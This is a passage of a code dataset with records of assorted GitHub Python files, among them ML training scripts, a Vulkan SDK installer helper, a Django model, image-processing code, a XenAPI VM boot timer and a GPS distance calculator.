f.write(\"Spearman correlation coefficient: \" + s + \"\\n\")\n f.close()\n else:\n spearman.append(0)\n f = open(\"print.dep\", \"a\")\n f.write(\"The result file for C=\"+str(params[0])+\" and L=\"+str(params[1])+\" has not been created\" + \"\\n\")\n f.close()\n index = spearman.index(max(spearman))\n params[cont] = values[index]\n\n f = open(\"print.dep\", \"a\")\n f.write(\"Optimal C = \" + str(params[0]) + \"\\n\")\n f.write(\"Optimal L = \" + str(params[1]) + \"\\n\")\n\n f.write(\"Retraining final model C = \" + str(params[0]) + \" and L = \" + str(params[1]) + \"\\n\")\n f.close()\n os.system('./baseline_svm_arff.sh '+str(params[0])+' '+str(params[1]))\n file = open('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.pred', 'r')\n data = file.readlines();\n err = []\n valor = []\n for x in data:\n line = x.split(\" \");\n line_rel = []\n for l in range(len(line)):\n if line[l] != '':\n line_rel.append(line[l])\n if len(line_rel) == 5:\n valor.append(float(line_rel[1]))\n err.append(float(line_rel[3]))\n error = 0\n rmse = 0\n for e in range(len(err)):\n error += abs(err[e])/(valor[e]*len(err))\n rmse += err[e]*err[e]/len(err)\n rmse = math.sqrt(rmse)\n file.close()\n file = open('eval/train_devel/'+FEATURE+'.SVR.C'+str(params[0])+'.L'+str(params[1])+'.result', 'r')\n data = file.readlines();\n for x in data:\n line = x.split(\" \");\n s = line[len(line)-1]\n spearman.append(float(s))\n file.close()\n f = open(\"print.dep\", \"a\")\n f.write(\"Spearman correlation coefficient final: \" + s + \"\\n\")\n f.write(\"RMSE: \" + str(rmse) + \"\\n\")\n f.write(\"RELATIVE ERROR: \" + str(error) + \"\\n\")\n\n f.write(\"Retraining initial model C = 0.001 and L = 1.0\" + \"\\n\")\n f.close()\n os.system('./baseline_svm_arff.sh 0.001 1.0')\n file = open('eval/train_devel/'+FEATURE+'.SVR.C0.001.L1.0.pred', 'r')\n data = file.readlines();\n err = []\n valor = []\n for x in data:\n line = x.split(\" \");\n line_rel = []\n for l in range(len(line)):\n if line[l] != '':\n line_rel.append(line[l])\n if len(line_rel) == 5:\n valor.append(float(line_rel[1]))\n err.append(float(line_rel[3]))\n error = 0\n rmse = 0\n for e in range(len(err)):\n error += abs(err[e])/(valor[e]*len(err))\n rmse += err[e]*err[e]/len(err)\n rmse = math.sqrt(rmse)\n file.close()\n file = open('eval/train_devel/'+FEATURE+'.SVR.C0.001.L1.0.result', 'r')\n data = file.readlines();\n for x in data:\n line = x.split(\" \");\n s = line[len(line)-1]\n spearman.append(float(s))\n file.close()\n f = open(\"print.dep\", \"a\")\n f.write(\"Spearman correlation coefficient initial: \" + s + \"\\n\")\n f.write(\"RMSE: \" + str(rmse) + \"\\n\")\n f.write(\"RELATIVE ERROR: \" + str(error) + \"\\n\")\n\nelse:\n f = open(\"print.dep\", \"a\")\n f.write(\"The bash script baseline_svm_arff.sh has not been created\")\n f.close()\n","repo_name":"clara-jr/Parkinson-Machine-Learning","sub_path":"baseline2/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72009186815","text":"import os\nimport sys\nimport subprocess\nimport platform\nfrom pathlib import Path\n\nif platform.system() == \"Windows\":\n import UtilsWindows as Utils\nelif platform.system() == \"Linux\":\n import UtilsLinux as Utils\n\nfrom io import BytesIO\nfrom urllib.request import urlopen\n\nclass VulkanConfiguration:\n requiredVulkanVersion = \"1.3.\"\n installVulkanVersion = \"1.3.216.0\"\n vulkanDirectory = \"./Labyrinth/dependencies/VulkanSDK\"\n\n if platform.system() == \"Windows\":\n vulkanPlatform = \"windows\"\n vulkanFilename = \"vulkan_sdk.exe\"\n vulkanExecPath = f\"{vulkanDirectory}/VulkanSDK-{installVulkanVersion}-Installer.exe\"\n elif platform.system() == \"Linux\":\n vulkanPlatform = \"linux\"\n vulkanFilename = \"vulkan_sdk.tar.gz\"\n vulkanExecPath = f\"{vulkanDirectory}/{installVulkanVersion}/vulkan_sdk\"\n\n @classmethod\n def Validate(cls):\n if (not cls.CheckVulkanSDK()):\n print(\"Vulkan SDK not installed correctly.\")\n return\n \n if (not cls.CheckVulkanSDKDebugLibs()):\n print(f\"\\nNo Vulkan SDK debug libs found. Install Vulkan SDK with debug libs.\")\n print(f\"\\nDebug configuration disabled.\")\n\n @classmethod\n def CheckVulkanSDK(cls):\n vulkanSDK = os.environ.get(\"VULKAN_SDK\")\n if (vulkanSDK is None):\n print(\"\\nYou don't have the Vulkan SDK installed!\")\n cls.__InstallVulkanSDK()\n return False\n else:\n print(f\"\\nLocated Vulkan SDK at {vulkanSDK}\")\n\n if (cls.requiredVulkanVersion not in vulkanSDK):\n print(f\"You don't have the correct Vulkan SDK version! (Engine requires {cls.requiredVulkanVersion})\")\n cls.__InstallVulkanSDK()\n return False\n \n print(f\"Correct Vulkan SDK located at {vulkanSDK}\")\n return True\n\n @classmethod\n def __InstallVulkanSDK(cls):\n permissionGranted = False\n while not permissionGranted:\n reply = str(input(\"Would you like to install VulkanSDK {0:s}? [Y/N]: \".format(cls.installVulkanVersion))).lower().strip()[:1]\n if reply == 'n':\n return\n permissionGranted = (reply == 'y')\n\n vulkanInstallURL = f\"https://sdk.lunarg.com/sdk/download/{cls.installVulkanVersion}/{cls.vulkanPlatform}/{cls.vulkanFilename}\"\n vulkanInstallPath = f\"{cls.vulkanDirectory}/{cls.vulkanFilename}\"\n print(\"Downloading {0:s} to {1:s}\".format(vulkanInstallURL, vulkanInstallPath))\n Utils.DownloadFile(vulkanInstallURL, vulkanInstallPath)\n print(\"Running Vulkan SDK installer...\") \n if platform.system() == \"linux\":\n print(\"Extracting\", vulkanInstallPath)\n Utils.UnpackFile(vulkanInstallPath, [], True)\n os.startfile(os.path.abspath(vulkanExecPath))\n print(\"Re-run this script after installation!\")\n quit()\n\n @classmethod\n def CheckVulkanSDKDebugLibs(cls):\n vulkanSDK = os.environ.get(\"VULKAN_SDK\")\n shadercdLib = Path(f\"{vulkanSDK}/Lib/shaderc_sharedd.lib\")\n \n return shadercdLib.exists()\n\nif __name__ == \"__main__\":\n VulkanConfiguration.Validate()","repo_name":"amayesingnathan/LabyrinthEngine","sub_path":"scripts/python/VulkanSetup.py","file_name":"VulkanSetup.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"70997992894","text":"from django.db import models\n\n\nclass Configuracao(models.Model):\n DISPONIBILIDADES_CHOICES = (\n (1, 'Um dia'),\n (3, 'Três dias'),\n (7, 'Uma semana dias'),\n (30, 'Um mês'),\n )\n\n enviar_msg = models.BooleanField(\n auto_created=True,\n default=True,\n verbose_name='Enviar mensagens automaticas'\n )\n grupos_permissao = models.BooleanField(\n auto_created=True,\n default=False,\n verbose_name='Grupos de permissões padrão criados'\n )\n agendamento = models.BooleanField(\n auto_created=True,\n default=True,\n verbose_name='Disponível para agendamento'\n )\n fidelidade = models.BooleanField(\n auto_created=True,\n default=False,\n verbose_name='Plano fidelidade'\n )\n validade = models.IntegerField(\n default=0,\n verbose_name='Quantidade em dias para a valide da fidelização'\n )\n quantidade_fidelidade = models.IntegerField(\n default=0,\n verbose_name='Qntd de serviços concluidos para completar a fidelização'\n )\n endereco = models.CharField(max_length=200, blank=False, null=False)\n instagram = models.URLField(max_length=200, blank=True, null=True)\n whatsapp = models.CharField(max_length=11, blank=False, null=False)\n celular = models.CharField(max_length=11, blank=False, null=False)\n gerar_disponibilidade = models.IntegerField(\n choices=DISPONIBILIDADES_CHOICES,\n default=1\n )\n horarios = models.ManyToManyField(\n 'horarios.Horario',\n related_name='configuracao_horario'\n )\n","repo_name":"Juzeka/Agendeer","sub_path":"configuracoes/models/configuracao.py","file_name":"configuracao.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4972911086","text":"import copy\nimport pickle\nimport nltk\nimport numpy as np\nimport torch\nimport json\nfrom torch.utils.data import Dataset, DataLoader\nfrom nltk.stem.porter import PorterStemmer\nstemmer = PorterStemmer()\ntorch.manual_seed(0)\n\n\ndef load_data(path):\n with open(path, 'r') as f:\n intents = json.load(f)\n return intents\n\n\nclass ChatDataGram(Dataset):\n\n def __init__(self, X, y):\n self.n_samples = len(X)\n self.x = X\n self.y = y\n\n def __getitem__(self, index):\n return self.x[index], self.y[index]\n\n def __len__(self):\n return self.n_samples\n\n\ndef load_data_gram(X, y, batch_size):\n dataset = ChatDataGram(X, y)\n return DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True)\n\n\ndef tokenize(sentence):\n return nltk.word_tokenize(sentence)\n\n\ndef stem(word):\n return stemmer.stem(word.lower())\n\n\ndef bag_of_words(tokenized_sentence, words):\n # stem each word\n sentence_words = [stem(word) for word in tokenized_sentence]\n # initialize bag with 0 for each word\n bag = np.zeros(len(words), dtype=np.float32)\n for idx, w in enumerate(words):\n if w in sentence_words:\n bag[idx] = 1\n\n return bag\n\n\ndef pattern_tag_words(intents, ignore_words, all_words_PIK):\n all_words = []\n tags = []\n patterns = []\n\n for intent in intents['intents']:\n tag = intent['tag']\n tags.append(tag)\n for pattern in intent['patterns']:\n w = tokenize(pattern)\n all_words.extend(w)\n patterns.append((w, tag))\n\n all_words = [stem(w) for w in all_words if w not in ignore_words]\n all_words = sorted(set(all_words))\n tags = sorted(set(tags))\n\n print(\"Dumping all_words\")\n with open(all_words_PIK, \"wb\") as f:\n pickle.dump({'all_words': all_words, 'tags': tags}, f)\n print(\"Done Dumping\")\n\n return patterns, tags, all_words\n\n\ndef get_x_y(patterns, tags, all_words):\n X_train = []\n Y_train = []\n for (pattern_sentence, tag) in patterns:\n bag = bag_of_words(pattern_sentence, all_words)\n X_train.append(bag)\n label = tags.index(tag)\n Y_train.append(label)\n return np.array(X_train), np.array(Y_train)\n\n\ndef train_loop(model, epochs, optimizer, criterion, train_loader, test_loader,\n printing_gap, saved_model_device, model_path, device, PIK_plot_data):\n train_loss = []\n train_acc = []\n test_acc = []\n greatest_test_accu = -np.inf\n\n for epoch in range(epochs):\n loss_train = 0\n\n for sentences, labels in train_loader:\n sentences, labels = sentences.to(device), labels.to(dtype=torch.long).to(device)\n\n output = model(sentences) # 1) Forward pass\n loss = criterion(output, labels) # 2) Compute loss\n optimizer.zero_grad()\n loss.backward() # 3) Backward pass\n optimizer.step() # 4) Update model\n\n loss_train += loss.item()\n\n model.eval()\n\n with torch.no_grad():\n train_num_correct = 0\n train_num_samples = 0\n\n for sentences, labels in iter(train_loader):\n sentences, labels = sentences.to(device), labels.to(dtype=torch.long).to(device)\n\n output = model(sentences)\n _, predictions = output.max(1)\n train_num_correct += (predictions == labels).sum()\n train_num_samples += predictions.size(0)\n\n with torch.no_grad():\n test_num_correct = 0\n test_num_samples = 0\n for sentences, labels in iter(test_loader):\n sentences, labels = sentences.to(device), labels.to(dtype=torch.long).to(device)\n\n output = model(sentences)\n _, predictions = output.max(1)\n test_num_correct += (predictions == labels).sum()\n test_num_samples += predictions.size(0)\n\n train_accu = float(train_num_correct) / train_num_samples * 100\n test_accu = float(test_num_correct) / test_num_samples * 100\n\n train_loss.append(loss_train / train_num_samples)\n train_acc.append(train_accu)\n test_acc.append(test_accu)\n\n # Save best model\n if test_accu >= greatest_test_accu:\n greatest_test_accu = test_accu\n\n best_model_state = copy.deepcopy(model)\n best_model_state.to(saved_model_device)\n torch.save(best_model_state, model_path)\n\n if epoch % printing_gap == 0:\n print('Epoch: {}/{}\\t.............'.format(epoch, epochs), end=' ')\n print(\"Train Loss: {:.4f}\".format(loss_train / train_num_samples), end=' ')\n print(\"Train Acc: {:.4f}\".format(train_accu), end=' ')\n print(\"Test Acc: {:.4f}\".format(test_accu), end=' ')\n print(\"Best Test Acc: {:.4f}\".format(greatest_test_accu))\n\n # Save data to pickle\n data = {'train_loss': train_loss, 'train_acc': train_acc, 'test_acc': test_acc}\n with open(PIK_plot_data, \"wb\") as f:\n pickle.dump(data, f)\n\n model.train()\n","repo_name":"anthony-chukwuemeka-nwachukwu/Chatbot","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73644216574","text":"# @description:\n# @author:Jianping Zhou\n# @email:jianpingzhou0927@gmail.com\n# @Time:2022/11/29 9:30\nimport cv2\nimport numpy as np\nfrom skimage import io\n\n# 导入图片\nraw_img = cv2.imread(\"../BMP_images/lena512.BMP\")\ncv2.imshow('raw_image', raw_img)\n\n# 转换灰度\n# gimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ngimg = raw_img\n\n# 高斯模糊化\n# dst = cv2.GaussianBlur(img,ksize=(5,5),sigmaX=0,sigmaY=0)\n# 创建毛玻璃特效\n# 参数2:高斯核的宽和高(建议是奇数)\n# 参数3:x和y轴的标准差\nimg = cv2.GaussianBlur(gimg, (11, 11), 0)\ncv2.imshow('GaussianBlur_image', img)\nio.imsave('./results/GaussianBlur_image.png', img)\n\n# 拉普拉斯算子锐化\nkernel = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]], np.float32) # 定义拉普拉斯算子\ndst = cv2.filter2D(img, -1, kernel=kernel) # 调用opencv图像锐化函数\n\n# sobel算子锐化\n# 对x方向梯度进行sobel边缘提取\nx = cv2.Sobel(gimg, cv2.CV_64F, 1, 0)\n# 对y方向梯度进行sobel边缘提取\ny = cv2.Sobel(gimg, cv2.CV_64F, 0, 1)\n# 对x方向转回uint8\nabsX = cv2.convertScaleAbs(x)\n# 对y方向转会uint8\nabsY = cv2.convertScaleAbs(y)\n# x,y方向合成边缘检测结果\ndst1 = cv2.addWeighted(absX, 0.5, absY, 0.5, 0)\n# 与原图像堆叠\nres = dst1 + gimg\n\n# 测试\n# print(\"dstshape:\",dst1)\n# print(\"resshape:\",res)\n\n# 按要求左右显示原图与拉普拉斯处理结果\n# result1 = np.hstack([raw_img, img, dst])\nresult1 = dst\ncv2.imshow('lapres', result1)\nio.imsave('./results/lapres.png', result1)\n\n# 按要求左右显示原图与sobel处理结果\n# result2 = np.hstack([raw_img, img, res])\nresult2 = res\ncv2.imshow('sobelres', result2)\nio.imsave('./results/sobelres.png', result2)\n\n# 去缓存\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"JeremyChou28/digital_image_processing","sub_path":"project3/sharpen_laplace.py","file_name":"sharpen_laplace.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"14345258445","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# Importing Necessary Libraries\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (20.0, 10.0)\n\n\n# In[4]:\n\n\n# Reading Data\ndata = pd.read_csv('/Users/shreyaspeherkar/Desktop/Dataset/HousingData.csv')\nprint(data.shape)\ndata.head()\n\n\n# In[5]:\n\n\n# Collecting X and Y\nX = data['DIS'].values\nY = data['MEDV'].values\n\n\n# In[7]:\n\n\nY\n#Y=mX+b m= difference in y coordinate/difference in x coordinate b= y-intercept\n\n\n# In[8]:\n\n\n# Calculating coefficient\n# Mean X and Y\nmean_x = np.mean(X)\nmean_y = np.mean(Y)\n# Total number of values\nn = len(X)\n\n\n# In[9]:\n\n\nn\n\n\n# In[10]:\n\n\n# Using the formula to calculate b1 and b2\nnumer = 0\ndenom = 0\nfor i in range(n):\n numer += (X[i] - mean_x) * (Y[i] - mean_y)\n denom += (X[i] - mean_x) ** 2\n b1 = numer / denom\n b0 = mean_y - (b1 * mean_x) \n# m(b1) and c(bo)\n# Printing coefficients \nprint(\"Coefficients\")\nprint(\"m=\",b1)\nprint(\"c=\",b0)\n\n\n# In[11]:\n\n\n# Plotting Values and Regression Line\nmax_x = np.max(X)\nmin_x = np.min(X)\n\n# Calculating line values x and y\n\nx = np.linspace(min_x, max_x, 1000)\ny = b0 + b1 * x\n\n# Ploting Line\n#plt.plot(x, y, color='#58b970', label='Regression Line')\nplt.plot(x, y, color='green', label='Regression Line')\n# Ploting Scatter Points\n#plt.scatter(X, Y, c='#ef5423', label='Scatter Plot') \nplt.scatter(X, Y, c='red', label='Scatter Plot')\n\nplt.xlabel('Head Size in cm3')\nplt.ylabel('Brain Weight in grams')\nplt.legend()\nplt.show()\n\n\n# In[12]:\n\n\n# Calculating R2 Score\nss_tot = 0\nss_res = 0\nfor i in range(n):\n y_pred = b0 + b1 * X[i]\n ss_tot += (Y[i] - mean_y) ** 2\n ss_res += (Y[i] - y_pred) ** 2\nr2 = 1 - (ss_res/ss_tot)\nprint(\"R2 Score\")\nprint(r2)\n\n\n# In[13]:\n\n\n#using scikit-learn\n\n\n# In[14]:\n\n\n# Importing Necessary Libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[16]:\n\n\ndata=pd.read_csv('/Users/shreyaspeherkar/Desktop/Dataset/HousingData.csv')\nX = data.iloc[:,7].values.reshape(-1,1) #converts it into numpy array\nY = data.iloc[:,13].values.reshape(-1,1) \nlinear_regressor=LinearRegression() # create obect for class \nlinear_regressor.fit(X,Y) # perform linear regression \ny_pred=linear_regressor.predict(X) # make prediction\n\n\n# In[17]:\n\n\nplt.scatter(X,Y)\nplt.plot(X,y_pred, color='red')\n\n\n# In[18]:\n\n\n# The coefficients\nprint(\"Coefficients: \\n\", linear_regressor.coef_)\n\n\n# In[19]:\n\n\nfrom sklearn.metrics import mean_squared_error, r2_score \nprint(\"Coefficient of determination: %.2f\" % r2_score(Y, y_pred))\n\n","repo_name":"Lagertharagnar/dsbda","sub_path":"DSBDA practical/DSBDA Practical No.04.py","file_name":"DSBDA Practical No.04.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28329683429","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/16 22:33\n# @Author : kangqing\n# @Email : kangqing.37@gmail.com\n# @File : LeetCode5185.py\n# @Software: PyCharm\n\"\"\" LeetCode5185 存在连续三个奇数的数组 \"\"\"\nfrom typing import List\n\n\nclass Solution:\n @staticmethod\n def three_consecutive_odds(arr: List[int]) -> bool:\n i, n = 1, len(arr)\n if n < 3:\n return False\n while i < n - 1:\n if arr[i] % 2 != 1:\n i += 1\n continue\n if arr[i - 1] % 2 != 1:\n i += 1\n continue\n if arr[i + 1] % 2 != 1:\n i += 1\n continue\n return True\n return False\n\n @staticmethod\n def three_consecutive_odds_1(arr: List[int]) -> bool:\n coll = list([])\n for x in arr:\n if x % 2 == 1:\n coll.append(x)\n if len(coll) == 3:\n return True\n else:\n coll.clear() \n return False\n\n\nif __name__ == '__main__':\n s = Solution()\n d = [1, 2, 34, 3, 4, 5, 7, 23, 12]\n print(s.three_consecutive_odds(d))\n print(s.three_consecutive_odds_1(d))\n\n","repo_name":"kangqing/LeetCode_Python","sub_path":"array/LeetCode5185.py","file_name":"LeetCode5185.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"23473342877","text":"#!/usr/bin/env python3\n\n# Naz-Al Islam\n# 04/18/16\n# Car racing game\n\n\nclass Car:\n\n def __init__(self, start_pos, speed):\n self.carPos = start_pos\n self.carSpeed = speed\n\n def drive(self, time, direction):\n self.drvTime = time\n self.drvDirection = direction\n if self.drvDirection == 'forward':\n self.carPos = self.carPos + self.drvTime * self.carSpeed\n elif self.drvDirection == 'backward':\n self.carPos = self.carPos - self.drvTime * self.carSpeed\n\n def printPosition(self):\n print('The car is currently at position ' + str(self.carPos))\n\n\ndef main():\n myCar = Car(2, 3) \n myCar.printPosition()\n myCar.drive(3, 'forward')\n myCar.printPosition()\n myCar.drive(2, 'backward')\n myCar.printPosition()\n\n print()\n\n newCar = Car(5, 7)\n newCar.printPosition()\n newCar.drive(4, 'forward')\n newCar.printPosition()\n newCar.drive(3, 'backward')\n newCar.printPosition()\n newCar.drive(1, 'backward')\n newCar.printPosition()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nazislam/Python-Console-Applications","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"29757583690","text":"# so replit recgonizes objects from cmu_graphics\nimport random\n\nrandrange = random.randrange\n\n\nclass app:\n background: str\n\n\nclass cmu_graphics:\n def run():\n ...\n\n\nclass Rect:\n def __init__(\n self,\n left,\n top,\n width,\n height,\n fill=\"black\",\n border=None,\n borderWidth=2,\n opacity=100,\n rotateAngle=0,\n dashes=False,\n align=\"left-top\",\n visible=True,\n ):\n ...\n\n\nclass Label:\n def __init__(\n self,\n value,\n centerX,\n centerY,\n size=12,\n font=\"arial\",\n bold=False,\n italic=False,\n fill=\"black\",\n border=None,\n borderWidth=2,\n opacity=100,\n rotateAngle=0,\n align=\"center\",\n visible=True,\n ):\n ...\n\n\nclass Image:\n health: int\n food: int\n\n def __init__(self, url, left, top):\n ...\n\n\nclass Group:\n def __init__(self, *args):\n ...\n\n\nclass Star:\n def __init__(\n centerX,\n centerY,\n radius,\n points,\n fill=\"black\",\n border=None,\n borderWidth=2,\n roundness=None,\n opacity=100,\n rotateAngle=0,\n dashes=False,\n align=\"center\",\n visible=True,\n ):\n ...\n\n\npythonRound = round\n","repo_name":"TheMaster3558/Orca-Migration","sub_path":"cmu_types.py","file_name":"cmu_types.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"2749564141","text":"#\r\n# UefiDevicePathLib.py\r\n#\r\n# Copyright (C) 2015 efipy.core@gmail.com All rights reserved.\r\n#\r\n# UefiDevicePathLib.py is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, version 2 of the License.\r\n#\r\n# EfiPy is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with EfiPy. If not, see .\r\n#\r\n\r\nUSB_CLASS_AUDIO = 1\r\nUSB_CLASS_CDCCONTROL = 2\r\nUSB_CLASS_HID = 3\r\nUSB_CLASS_IMAGE = 6\r\nUSB_CLASS_PRINTER = 7\r\nUSB_CLASS_MASS_STORAGE = 8\r\nUSB_CLASS_HUB = 9\r\nUSB_CLASS_CDCDATA = 10\r\nUSB_CLASS_SMART_CARD = 11\r\nUSB_CLASS_VIDEO = 14\r\nUSB_CLASS_DIAGNOSTIC = 220\r\nUSB_CLASS_WIRELESS = 224\r\n\r\nUSB_CLASS_RESERVE = 254\r\nUSB_SUBCLASS_FW_UPDATE = 1\r\nUSB_SUBCLASS_IRDA_BRIDGE = 2\r\nUSB_SUBCLASS_TEST = 3\r\n\r\nRFC_1700_UDP_PROTOCOL = 17\r\nRFC_1700_TCP_PROTOCOL = 6\r\n\r\n","repo_name":"melxman/UEFI-BIOS-Flasher","sub_path":"StdLib/lib/python.27/site-packages/EfiPy/MdePkg/Library/UefiDevicePathLib.py","file_name":"UefiDevicePathLib.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"2008864573","text":"from __future__ import print_function\nimport XenAPI\nimport sys\nimport time\n\nvgm_to_vm = {}\n\n\ndef register_vm_metrics(session, vm_ref, vgm):\n global vgm_to_vm\n\n try:\n # avoid putting invalid references in the cache\n tmp = session.xenapi.VM_guest_metrics.get_other(vgm)\n vgm_to_vm[vgm] = vm_ref\n except:\n pass\n\n\ndef vm_of_metrics(ref):\n global vgm_to_vm\n if not(ref in vgm_to_vm.keys()):\n return None\n return vgm_to_vm[ref] \n\ninteresting_vms = []\nvm_boot_times = {}\nboots_seen = 0\n\n\ndef dump_table(session):\n global vm_boot_times\n for vm_ref in vm_boot_times.keys():\n name = session.xenapi.VM.get_name_label(vm_ref)\n print(\"%s %s\" % (name, vm_boot_times[vm_ref]))\n\n\ndef seen_possible_boot(session, vm_ref):\n global vm_boot_times\n global interesting_vms\n global boots_seen\n if not(vm_ref in vm_boot_times.keys()) and vm_ref in interesting_vms:\n t = time.strftime( \"%Y%m%dT%H:%M:%SZ\", time.gmtime())\n vm_boot_times[vm_ref] = t\n boots_seen += 1\n \n name = session.xenapi.VM.get_name_label(vm) \n print(\"%d %s %s\" % (boots_seen, name, t), file=sys.stdout)\n print(\"%d %s %s\" % (boots_seen, name, t), file=sys.stderr)\n sys.stderr.flush()\n\n\ndef process_guest_metrics(session, ref, snapshot):\n if \"other\" in snapshot.keys():\n other = snapshot[\"other\"]\n if \"feature-shutdown\" in other.keys():\n the_vm = vm_of_metrics(ref)\n seen_possible_boot(session, the_vm)\n\n\ndef poll_metrics(session):\n while True:\n time.sleep(10)\n all_recs = session.xenapi.VM_guest_metrics.get_all_records()\n for ref in all_recs.keys():\n snapshot = all_recs[ref]\n process_guest_metrics(session, ref, snapshot)\n\n\ndef process_metrics_event(session, ref):\n vm_ref = vm_of_metrics(ref)\n if vm_ref is None:\n return\n if session.xenapi.VM.get_power_state(vm_ref) != \"Running\":\n return\n other = {}\n try:\n other=session.xenapi.VM_guest_metrics.get_other(ref)\n except Exception as e:\n print(repr(e))\n \n if \"feature-shutdown\" in other.keys():\n seen_possible_boot(session, vm_ref)\n \n\ndef watch_events_on_vm(session):\n try:\n token = ''\n call_timeout = 30.0\n while True:\n output = session.xenapi.event_from([\"VM\", \"VM_guest_metrics\"], token, call_timeout)\n events = output['events']\n token = output['token']\n\n for event in events:\n if event['operation'] == 'del':\n continue\n if event['class'] == 'vm' and event['operation'] == 'mod':\n register_vm_metrics(session, event['ref'], event['snapshot']['guest_metrics'])\n continue\n if event['class'] == 'vm_guest_metrics':\n process_metrics_event(session, event['ref'])\n continue\n\n except XenAPI.Failure as e:\n print(e.details)\n sys.exit(1)\n finally:\n session.xenapi.session.logout()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 4 or len(sys.argv) < 2:\n print(\"\"\"\nWatches all offline VMs for boots\nUsage:\n %s \nor\n %s [http://]localhost [] []\n\"\"\" % (sys.argv[0], sys.argv[0]))\n sys.exit(1)\n\n url = sys.argv[1]\n username = sys.argv[2] if len(sys.argv) > 2 else \"\"\n password = sys.argv[3] if len(sys.argv) > 3 else \"\"\n\n if url == \"http://localhost\" or url == \"localhost\":\n new_session = XenAPI.xapi_local()\n else:\n new_session = XenAPI.Session(url)\n\n # First acquire a valid session by logging in\n try:\n new_session.xenapi.login_with_password(username, password, \"1.0\", \"xen-api-scripts-timevmboots.py\")\n except XenAPI.Failure as f:\n print(\"Failed to acquire a session: %s\" % f.details)\n sys.exit(1)\n\n # We start watching all Halted VMs\n all_halted_vms = new_session.xenapi.VM.get_all_records()\n for vm in all_halted_vms.keys():\n vm_rec = all_halted_vms[vm]\n if vm_rec[\"power_state\"] == \"Halted\" and not vm_rec[\"is_a_template\"]:\n interesting_vms.append(vm)\n print(\"Watching %d offline VMs\" % (len(interesting_vms)), file=sys.stderr)\n\n watch_events_on_vm(new_session)\n","repo_name":"xapi-project/xen-api","sub_path":"scripts/time-vm-boots.py","file_name":"time-vm-boots.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"79"} +{"seq_id":"42956294645","text":"#! /usr/bin/env python\n\n\"\"\"\nUpdate Emlid Reach CSV Survey points with PPK position accuracy\n\nAuthor: Thomas Van Der Weide\n\"\"\"\n\nimport pandas as pd\nimport glob\nfrom geopy import Point, distance\nimport os\n\n\ndef calc_distances(coords: pd.DataFrame,\n col_lat='latitude(deg)',\n col_lon='longitude(deg)',\n point_obj=Point) -> pd.DataFrame:\n traces = len(coords)\n distances = [None] * (traces)\n for i in range(traces):\n # start = point_obj((coords.iloc[0][col_lat], coords.iloc[0][col_lon]))\n # Find the distance from the mean location\n start = point_obj((coords[col_lat].mean(), coords[col_lon].mean()))\n finish = point_obj((coords.iloc[i][col_lat], coords.iloc[i][col_lon]))\n distances[i] = {\n 'start': start,\n 'finish': finish,\n 'path distance': distance.geodesic(start, finish).meters,\n }\n \n distVec = pd.DataFrame(distances)[\"path distance\"]\n\n return distances, distVec\n\n\n\nif __name__ == \"__main__\": \n #Define CSV and POS file locations\n main_fold = \"E:/SnowDrones_HDrive/2022_Data/SurveyDates/22-3-17_PilotsPeak/SDP/rinex_reach_raw_202203172156/\"\n \n # Find the CSV file\n for csvFN in sorted(glob.iglob(main_fold + \"Comp.csv\")):\n csvFN = csvFN.replace('\\\\', '/')\n print(\"csvFN: \", csvFN)\n survey_pts_csv_fn = csvFN\n \n \n #Load the Files\n print('Loading: %s' % survey_pts_csv_fn)\n survey_pts = pd.read_csv(survey_pts_csv_fn, index_col=0)\n out_pt = []\n print('Processing %i input points' % survey_pts.shape[0])\n for GCP, pt in survey_pts.iterrows():\n print(GCP)\n PythonPPK = Point((pt[\"PyLat\"], pt[\"PyLon\"]))\n EmlidPPK = Point((pt[\"EmLat\"], pt[\"EmLon\"]))\n print(distance.geodesic(PythonPPK, 